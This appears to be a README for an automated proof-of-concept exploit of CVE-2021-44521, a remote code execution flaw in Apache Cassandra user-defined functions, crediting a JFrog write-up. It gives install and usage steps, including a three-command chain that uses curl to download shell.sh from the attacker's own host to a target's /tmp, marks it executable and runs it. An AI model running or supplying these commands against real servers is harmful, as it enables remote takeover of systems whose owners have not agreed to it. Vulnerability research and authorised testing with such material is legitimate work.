Home

Awesome

CVE-2021-44521

Automated PoC of CVE-2021-44521 Credits to original poc: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/

Requirements

Cassandra-driver

pip3 install cassandra-driver

Usage

python3 poc.py <ip> <cmd>

Note that you can't do more command at a time, neither use pipes as of yet. So run

pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"